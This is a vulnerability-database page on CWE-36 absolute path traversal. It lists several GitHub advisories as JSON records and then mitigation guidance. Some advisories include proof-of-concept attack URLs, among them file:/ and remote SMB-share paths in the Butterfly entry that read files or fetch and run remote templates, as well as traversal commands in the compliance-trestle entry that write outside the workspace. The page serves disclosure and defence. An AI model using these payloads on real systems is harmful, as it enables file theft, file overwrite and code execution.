Common Weakness Enumeration

CWE-36

Allowed

Absolute Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory.

245 vulnerabilities reference this CWE, most recent first.

GHSA-3P8V-W8MR-M3X8

Vulnerability from github – Published: 2024-10-24 18:16 – Updated: 2024-10-24 21:46
VLAI
Summary
Butterfly has path/URL confusion in resource handling leading to multiple weaknesses
Details

Summary

The Butterfly framework uses the java.net.URL class to refer to (what are expected to be) local resource files, like images or templates. This works: "opening a connection" to these URLs opens the local file. However, if a file:/ URL is directly given where a relative path (resource name) is expected, this is also accepted in some code paths; the app then fetches the file, from a remote machine if indicated, and uses it as if it was a trusted part of the app's codebase.

This leads to multiple weaknesses and potential weaknesses:

  • An attacker that has network access to the application could use it to gain access to files, either on the the server's filesystem (path traversal) or shared by nearby machines (server-side request forgery with e.g. SMB).
  • An attacker that can lead or redirect a user to a crafted URL belonging to the app could cause arbitrary attacker-controlled JavaScript to be loaded in the victim's browser (cross-site scripting).
  • If an app is written in such a way that an attacker can influence the resource name used for a template, that attacker could cause the app to fetch and execute an attacker-controlled template (remote code execution).

Details

The edu.mit.simile.butterfly.ButterflyModuleImpl.getResource method converts a resource name into an URL, for instance:

images/logo-gem-126.svg
file:/C:/Users/Wander/IdeaProjects/OpenRefine/main/webapp/modules/core/images/logo-gem-126.svg

If the resource name already starts with file:/, it is passed through unmodified (line 287). There is no check that the resulting URL is inside the expected directory or on the same machine.

The default implementation for process in ButterflyModuleImpl is to serve a named resource, which makes it vulnerable. The Velocity template library is bound to the same getResource implementation through the ButterflyResourceLoader class, which means it is also vulnerable if template resource names can somehow be influenced by an attacker.

PoC

This demonstration has been tested with OpenRefine on a Windows machine. Start OpenRefine, create a file (here example.js) with some contents, then concatenate the OpenRefine URL and its file:/ URL, as follows:

http://localhost:3333/file:/C:/Users/Wander/example.js

The file is read and sent to the browser. Then, visit:

http://localhost:3333/file:%2f%2fwandernauta.nl/public/demo.html

Assuming there are no firewalls in the way, the HTML page is retrieved from the public SMB (Samba) network share and sent to the browser, which executes the embedded JavaScript.

In the case of OpenRefine specifically, to demonstrate the attacker-controlled template name case:

http://localhost:3333/file:%2f%2fwandernauta.nl/public/index

An index.vt template containing the snippet above is retrieved from the same share, which is then executed; the Windows calculator opens.

Impact

Depending on how the framework is used: path traversal, XSS, SSRF; potentially RCE.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.openrefine.dependencies:butterfly"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47883"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-24T18:16:43Z",
    "nvd_published_at": "2024-10-24T21:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe Butterfly framework uses the `java.net.URL` class to refer to (what are expected to be) local resource files, like images or templates. This works: \"opening a connection\" to these URLs opens the local file. However, if a `file:/` URL is directly given where a relative path (resource name) is expected, this is also accepted in some code paths; the app then fetches the file, from a remote machine if indicated, and uses it as if it was a trusted part of the app\u0027s codebase.\n\nThis leads to multiple weaknesses and potential weaknesses:\n\n* An attacker that has network access to the application could use it to gain access to files, either on the the server\u0027s filesystem (path traversal) or shared by nearby machines (server-side request forgery with e.g. SMB).\n* An attacker that can lead or redirect a user to a crafted URL belonging to the app could cause arbitrary attacker-controlled JavaScript to be loaded in the victim\u0027s browser (cross-site scripting).\n* If an app is written in such a way that an attacker can influence the resource name used for a template, that attacker could cause the app to fetch and execute an attacker-controlled template (remote code execution).\n\n### Details\n\nThe `edu.mit.simile.butterfly.ButterflyModuleImpl.getResource` method converts a resource name into an URL, for instance:\n\n```\nimages/logo-gem-126.svg\nfile:/C:/Users/Wander/IdeaProjects/OpenRefine/main/webapp/modules/core/images/logo-gem-126.svg\n```\n\nIf the resource name already starts with `file:/`, it is passed through unmodified (line 287). There is no check that the resulting URL is inside the expected directory or on the same machine.\n\nThe default implementation for `process` in `ButterflyModuleImpl` is to serve a named resource, which makes it vulnerable. The Velocity template library is bound to the same `getResource` implementation through the `ButterflyResourceLoader` class, which means it is also vulnerable if template resource names can somehow be influenced by an attacker.\n\n### PoC\n\nThis demonstration has been tested with [OpenRefine](https://github.com/OpenRefine/OpenRefine) on a Windows machine. Start OpenRefine, create a file (here `example.js`) with some contents, then concatenate the OpenRefine URL and its `file:/` URL, as follows:\n\n    http://localhost:3333/file:/C:/Users/Wander/example.js\n\nThe file is read and sent to the browser. Then, visit:\n\n    http://localhost:3333/file:%2f%2fwandernauta.nl/public/demo.html\n\nAssuming there are no firewalls in the way, the HTML page is retrieved from the public SMB (Samba) network share and sent to the browser, which executes the embedded JavaScript.\n\nIn the case of OpenRefine specifically, to demonstrate the attacker-controlled template name case:\n\n    http://localhost:3333/file:%2f%2fwandernauta.nl/public/index\n\nAn `index.vt` template containing the snippet above is retrieved from the same share, which is then executed; the Windows calculator opens.\n\n### Impact\n\nDepending on how the framework is used: path traversal, XSS, SSRF; potentially RCE.",
  "id": "GHSA-3p8v-w8mr-m3x8",
  "modified": "2024-10-24T21:46:18Z",
  "published": "2024-10-24T18:16:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenRefine/simile-butterfly/security/advisories/GHSA-3p8v-w8mr-m3x8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47883"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OpenRefine/simile-butterfly/commit/537f64bfa72746f8b21d4bda461fad843435319c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenRefine/simile-butterfly"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Butterfly has path/URL confusion in resource handling leading to multiple weaknesses"
}

GHSA-3R5R-4R48-4HXH

Vulnerability from github – Published: 2025-08-13 12:31 – Updated: 2025-08-13 12:31
VLAI
Details

Organization Portal System developed by WellChoose has an Arbitrary File Reading vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-8912"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-13T10:15:26Z",
    "severity": "HIGH"
  },
  "details": "Organization Portal System developed by WellChoose has an Arbitrary File Reading vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files.",
  "id": "GHSA-3r5r-4r48-4hxh",
  "modified": "2025-08-13T12:31:30Z",
  "published": "2025-08-13T12:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8912"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-10325-70192-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-10321-3cae5-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-42R3-W28V-2547

Vulnerability from github – Published: 2026-01-05 09:30 – Updated: 2026-01-05 09:30
VLAI
Details

QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-15237"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-05T08:15:57Z",
    "severity": "MODERATE"
  },
  "details": "QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability.",
  "id": "GHSA-42r3-w28v-2547",
  "modified": "2026-01-05T09:30:19Z",
  "published": "2026-01-05T09:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15237"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-45H5-66JX-R2WF

Vulnerability from github – Published: 2025-12-15 00:30 – Updated: 2026-06-26 20:28
VLAI
Summary
MJML allows mj-include directory traversal due to an incomplete fix for CVE-2020-12827
Details

MJML before 5.0.0-alpha.9 allows mj-include directory traversal to test file existence and (in the type="css" case) read files. NOTE: this issue exists because of an incomplete fix for CVE-2020-12827.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "mjml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.0-alpha.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67898"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-17T18:12:02Z",
    "nvd_published_at": "2025-12-14T22:15:36Z",
    "severity": "MODERATE"
  },
  "details": "MJML before 5.0.0-alpha.9 allows mj-include directory traversal to test file existence and (in the type=\"css\" case) read files. NOTE: this issue exists because of an incomplete fix for CVE-2020-12827.",
  "id": "GHSA-45h5-66jx-r2wf",
  "modified": "2026-06-26T20:28:42Z",
  "published": "2025-12-15T00:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12827"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67898"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mjmlio/mjml/issues/3018"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mjmlio/mjml/pull/3033"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mjmlio/mjml/commit/517b376b068e71c713ec4bb4ef9e5b0b7235b8ce"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mjmlio/mjml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MJML allows mj-include directory traversal due to an incomplete fix for CVE-2020-12827"
}

GHSA-47F6-5P7H-5F3H

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 19:53
VLAI
Summary
H2O Vulnerable to Arbitrary File Overwrite via File Export
Details

In h2oai/h2o-3 version 3.46.0, the endpoint for exporting models does not restrict the export location, allowing an attacker to export a model to any file in the server's file structure, thereby overwriting it. This vulnerability can be exploited to overwrite any file on the target server with a trained model file, although the content of the overwrite is not controllable by the attacker.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "h2o"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.32.1.1"
            },
            {
              "last_affected": "3.46.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ai.h2o:h2o-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.32.1.1"
            },
            {
              "last_affected": "3.46.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-6854"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-20T19:53:19Z",
    "nvd_published_at": "2025-03-20T10:15:34Z",
    "severity": "HIGH"
  },
  "details": "In h2oai/h2o-3 version 3.46.0, the endpoint for exporting models does not restrict the export location, allowing an attacker to export a model to any file in the server\u0027s file structure, thereby overwriting it. This vulnerability can be exploited to overwrite any file on the target server with a trained model file, although the content of the overwrite is not controllable by the attacker.",
  "id": "GHSA-47f6-5p7h-5f3h",
  "modified": "2025-03-20T19:53:19Z",
  "published": "2025-03-20T12:32:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6854"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/h2oai/h2o-3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h2oai/h2o-3/blob/a20b5b19b769866ee24b217ee78b820e64c1cd6a/h2o-core/src/main/java/hex/Model.java#L3366"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/97d013f9-ac51-4c80-8dd7-8dfde11f33b2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "H2O Vulnerable to Arbitrary File Overwrite via File Export"
}

GHSA-4J95-FGXH-Q5GX

Vulnerability from github – Published: 2025-07-29 06:30 – Updated: 2025-07-29 06:30
VLAI
Details

Absolute Path Traversal in Samsung DMS(Data Management Server) allows authenticated attacker (Administrator) to read sensitive files

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53079"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-29T05:15:31Z",
    "severity": "MODERATE"
  },
  "details": "Absolute Path Traversal in Samsung DMS(Data Management Server) allows authenticated attacker (Administrator) to read sensitive files",
  "id": "GHSA-4j95-fgxh-q5gx",
  "modified": "2025-07-29T06:30:21Z",
  "published": "2025-07-29T06:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53079"
    },
    {
      "type": "WEB",
      "url": "https://security.samsungda.com/securityUpdates.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4Q5V-7G7X-J79W

Vulnerability from github – Published: 2026-05-28 17:44 – Updated: 2026-05-28 17:44
VLAI
Summary
compliance-trestle - jinja has an Arbitrary File Write via Path Traversal
Details

Relevant Products/Components:

  • trestle/core/commands/author/jinja.py
  • trestle author jinja

Detailed Description:

The -o/--output argument in trestle author jinja allows writing files outside the intended workspace.

The application does not properly validate:

  • ../
  • ..\
  • absolute paths

This allows arbitrary file write to attacker-controlled locations.

Vulnerable code:

output_file = trestle_root / r_output_file

An attacker can overwrite files such as:

  • .github/workflows/*.yml
  • .git/hooks/*
  • user writable config files

This can lead to CI/CD compromise or local code execution.


Steps To Reproduce:

  1. Clone the repository:
git clone https://github.com/oscal-compass/compliance-trestle.git
cd compliance-trestle
  1. Create template:
echo "hello" > template.j2
  1. Run:
trestle author jinja -i template.j2 -o "subdir\..\..\..\..\..\poc.txt"
  1. Observe:
dir E:\poc.txt

The file is written outside the repository workspace.


Browsers Verified In:

Not browser related.

Tested on:

  • Windows 11
  • Python 3.13

Supporting Material/References:

Affected file:

trestle/core/commands/author/jinja.py

Successfully verified:

  • directory traversal using ../
  • Windows traversal using ..\
  • arbitrary file write outside workspace

Access Vector Required for Exploitation:

Local


Vulnerability Exists in Default Configuration?:

Yes


Is the exploitation trivial or does it involve a multi-step process that may depend on user/victim interaction?:

Trivial. Single command execution.


Exploitation Requires Authentication?:

No


Under what privileges does the vulnerable service or component run?:

Runs with privileges of the user executing the trestle command.

Impact

An attacker can write files outside the intended workspace directory and overwrite sensitive files writable by the current user.

Possible impacts include:

  • overwriting .github/workflows/*.yml to execute attacker-controlled GitHub Actions workflows
  • overwriting .git/hooks/* for local code execution
  • modifying user configuration files such as .bashrc
  • tampering with repository files and generated compliance artifacts

In CI/CD environments, this may result in execution of attacker-controlled commands on build runners.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "compliance-trestle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.12.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "compliance-trestle"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.12.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46345"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-28T17:44:03Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "**Relevant Products/Components:**\n\n* `trestle/core/commands/author/jinja.py`\n* `trestle author jinja`\n\n---\n\n## Detailed Description:\n\nThe `-o/--output` argument in `trestle author jinja` allows writing files outside the intended workspace.\n\nThe application does not properly validate:\n\n* `../`\n* `..\\`\n* absolute paths\n\nThis allows arbitrary file write to attacker-controlled locations.\n\nVulnerable code:\n\n```python\noutput_file = trestle_root / r_output_file\n```\n\nAn attacker can overwrite files such as:\n\n* `.github/workflows/*.yml`\n* `.git/hooks/*`\n* user writable config files\n\nThis can lead to CI/CD compromise or local code execution.\n\n---\n\n## Steps To Reproduce:\n\n1. Clone the repository:\n\n```bash\ngit clone https://github.com/oscal-compass/compliance-trestle.git\ncd compliance-trestle\n```\n\n2. Create template:\n\n```bash\necho \"hello\" \u003e template.j2\n```\n\n3. Run:\n\n```powershell\ntrestle author jinja -i template.j2 -o \"subdir\\..\\..\\..\\..\\..\\poc.txt\"\n```\n\n4. Observe:\n\n```powershell\ndir E:\\poc.txt\n```\n\nThe file is written outside the repository workspace.\n\n---\n\n## Browsers Verified In:\n\nNot browser related.\n\nTested on:\n\n* Windows 11\n* Python 3.13\n\n---\n\n## Supporting Material/References:\n\nAffected file:\n\n```text\ntrestle/core/commands/author/jinja.py\n```\n\nSuccessfully verified:\n\n* directory traversal using `../`\n* Windows traversal using `..\\`\n* arbitrary file write outside workspace\n\n---\n\n## Access Vector Required for Exploitation:\n\nLocal\n\n---\n\n## Vulnerability Exists in Default Configuration?:\n\nYes\n\n---\n\n## Is the exploitation trivial or does it involve a multi-step process that may depend on user/victim interaction?:\n\nTrivial.\nSingle command execution.\n\n---\n\n## Exploitation Requires Authentication?:\n\nNo\n\n---\n\n## Under what privileges does the vulnerable service or component run?:\n\nRuns with privileges of the user executing the `trestle` command.\n\n## Impact\n\nAn attacker can write files outside the intended workspace directory and overwrite sensitive files writable by the current user.\n\nPossible impacts include:\n\n* overwriting `.github/workflows/*.yml` to execute attacker-controlled GitHub Actions workflows\n* overwriting `.git/hooks/*` for local code execution\n* modifying user configuration files such as `.bashrc`\n* tampering with repository files and generated compliance artifacts\n\nIn CI/CD environments, this may result in execution of attacker-controlled commands on build runners.",
  "id": "GHSA-4q5v-7g7x-j79w",
  "modified": "2026-05-28T17:44:03Z",
  "published": "2026-05-28T17:44:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-4q5v-7g7x-j79w"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oscal-compass/compliance-trestle/commit/247fcce289f60103f3d8e28d8ec51a6986b94fb6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oscal-compass/compliance-trestle/commit/7d107b3ac53caca7bde97a6278b23cd739d94525"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/oscal-compass/compliance-trestle"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "compliance-trestle - jinja has an Arbitrary File Write via Path Traversal"
}

GHSA-4QVC-C86C-G9QP

Vulnerability from github – Published: 2024-06-06 21:30 – Updated: 2024-06-06 21:30
VLAI
Details

A path traversal vulnerability exists in the parisneo/lollms-webui application, specifically within the lollms_core/lollms/server/endpoints/lollms_binding_files_server.py and lollms_core/lollms/security.py files. Due to inadequate validation of file paths between Windows and Linux environments using Path(path).is_absolute(), attackers can exploit this flaw to read any file on the system. This issue affects the latest version of LoLLMs running on the Windows platform. The vulnerability is triggered when an attacker sends a specially crafted request to the /user_infos/{path:path} endpoint, allowing the reading of arbitrary files, as demonstrated with the win.ini file. The issue has been addressed in version 9.5 of the software.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2548"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-06T19:15:55Z",
    "severity": "HIGH"
  },
  "details": "A path traversal vulnerability exists in the parisneo/lollms-webui application, specifically within the `lollms_core/lollms/server/endpoints/lollms_binding_files_server.py` and `lollms_core/lollms/security.py` files. Due to inadequate validation of file paths between Windows and Linux environments using `Path(path).is_absolute()`, attackers can exploit this flaw to read any file on the system. This issue affects the latest version of LoLLMs running on the Windows platform. The vulnerability is triggered when an attacker sends a specially crafted request to the `/user_infos/{path:path}` endpoint, allowing the reading of arbitrary files, as demonstrated with the `win.ini` file. The issue has been addressed in version 9.5 of the software.",
  "id": "GHSA-4qvc-c86c-g9qp",
  "modified": "2024-06-06T21:30:36Z",
  "published": "2024-06-06T21:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2548"
    },
    {
      "type": "WEB",
      "url": "https://github.com/parisneo/lollms-webui/commit/49b0332e98d42dd5204dda53dee410b160106265"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/65979513-db0d-46fd-9977-fcd73bcd8a41"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RCJ-FMJG-Q9FV

Vulnerability from github – Published: 2024-07-17 18:31 – Updated: 2024-07-17 18:31
VLAI
Details

A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system.

This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device.

Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-20401"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-36"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-17T17:15:13Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system.\n\n This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device.\n\n Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.",
  "id": "GHSA-4rcj-fmjg-q9fv",
  "modified": "2024-07-17T18:31:00Z",
  "published": "2024-07-17T18:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20401"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-afw-bGG2UsjH"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4W9W-3V73-2RH7

Vulnerability from github – Published: 2022-11-04 19:01 – Updated: 2022-11-08 19:00
VLAI
Details

A vulnerability in the web-based management interface of Cisco BroadWorks CommPilot application could allow an unauthenticated, remote attacker to perform a server-side request forgery (SSRF) attack on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web interface. A successful exploit could allow the attacker to obtain confidential information from the BroadWorks server and other device on the network. {{value}} ["%7b%7bvalue%7d%7d"])}]]

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-20958"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-36",
      "CWE-918"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-04T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the web-based management interface of Cisco BroadWorks CommPilot application could allow an unauthenticated, remote attacker to perform a server-side request forgery (SSRF) attack on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web interface. A successful exploit could allow the attacker to obtain confidential information from the BroadWorks server and other device on the network. {{value}} [\"%7b%7bvalue%7d%7d\"])}]]",
  "id": "GHSA-4w9w-3v73-2rh7",
  "modified": "2022-11-08T19:00:23Z",
  "published": "2022-11-04T19:01:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20958"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-broadworks-ssrf-BJeQfpp"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-broadworks-ssrf-BJeQfpp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20
Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-597: Absolute Path Traversal

